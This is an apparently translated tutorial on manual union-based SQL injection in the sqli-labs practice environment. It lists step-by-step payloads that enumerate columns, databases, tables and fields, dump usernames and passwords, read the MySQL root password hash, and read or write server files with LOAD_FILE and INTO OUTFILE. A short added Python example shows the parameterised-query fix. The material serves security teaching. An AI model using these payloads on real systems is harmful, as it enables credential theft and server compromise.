Manual SQL injection: a simple reusable walkthrough

Injection environment: sqli-labs-master

Starting with the simplest case.

[screenshot: 1.png]

First, look at the MySQL query behind the page:

select * from users where id='$id'    // id is entirely user-controlled

select * from users where id='1' and 1=1 --+ '  // bad: the comment swallows the trailing quote

Enumerate the columns, then DATABASES, TABLES and COLUMNS.

select * from users where id='1' and 1=1 union select 1,2,3,4,5 --+
select * from users where id='1' order by 1,2,3,4,5 --+      // alternative: order by, raising the column number until it errors

[screenshot: 4.png]

The error message shows that 1,2,3 work, i.e. the query has three columns;

[screenshot: 5.png]

[screenshot: 6.png]

Query the current database name with a built-in function:

[screenshot: 7.png]

select * from users where id='1' and 1=2 union select 1,database(),3 --+ // the statement

Query the database's tables:

[screenshot: 8.png]

' and 1=2 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' --+

Query the columns of a given table:

[screenshot: 9.png]

' and 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

Query the column data:

[screenshot: 10.png]

' and 1=2 union select 1,group_concat(username),group_concat(password) from users --+
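As an added example (not part of the original post): the concatenated query from the start of the walkthrough beside a parameterised version, run against a constructed in-memory SQLite table so the difference can be checked offline. The table name and rows are assumptions standing in for the lab's users table; the payload is the last one above, reused as-is.

```python
import sqlite3

# Constructed sample rows standing in for the lab's users table (assumption, not the lab's data).
SAMPLE_ROWS = [(1, "alice", "pw-alice"), (2, "bob", "pw-bob")]

# The final payload from the walkthrough, with the leading id value included.
PAYLOAD = "1' and 1=2 union select 1,group_concat(username),group_concat(password) from users --+"


def make_db() -> sqlite3.Connection:
    """In-memory table with the same three-column shape the walkthrough discovers."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """The post's pattern: $id is pasted into the SQL text, so a quote, UNION and --
    arriving from the user are parsed as SQL rather than compared as data."""
    sql = f"SELECT * FROM users WHERE id='{user_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    """The fix: bind the value as a parameter. The engine receives it separately from
    the statement text, so the whole payload is one literal compared against id."""
    return conn.execute("SELECT * FROM users WHERE id=?", (user_id,)).fetchall()


def usernames_in(rows: list) -> set:
    """Collect every username present in a result set (splits group_concat output)."""
    names = set()
    for row in rows:
        names.update(str(row[1]).split(","))
    return names


if __name__ == "__main__":
    db = make_db()
    print("concatenated, id=1    :", vulnerable_lookup(db, "1"))
    print("concatenated, payload :", vulnerable_lookup(db, PAYLOAD))
    print("parameterised, id=1   :", safe_lookup(db, "1"))
    print("parameterised, payload:", safe_lookup(db, PAYLOAD))
```

With the concatenated query the payload returns one row carrying every username and password; with the bound parameter the same string matches no id and returns nothing.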

Commonly used built-in functions:

VERSION() or @@VERSION  // database version
USER(), CURRENT_USER(), CURRENT_USER, SYSTEM_USER(), SESSION_USER()  // current user
id=1%27%20and%201=2%20union%20select%201,2,group_concat%28unhex%28hex%28password%29%29%29%20from%20mysql.user%20where%20user=%27root%27%20--+
Error: Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'  // caused by the two halves of the UNION using different character sets; unhex(hex()) works around it

Query the schema names:

database()  // the current database
?id=1%27%20and%201=2%20union%20select%201,group_concat(schema_name),3%20from%20information_schema.schemata--+

Get the hostname:

@@hostname;

Read a file:

LOAD_FILE('path, or its hex encoding')  // the default directory is @@datadir;

Write a file:

select 1,'content, or its hex encoding',3 into outfile '/var/www';
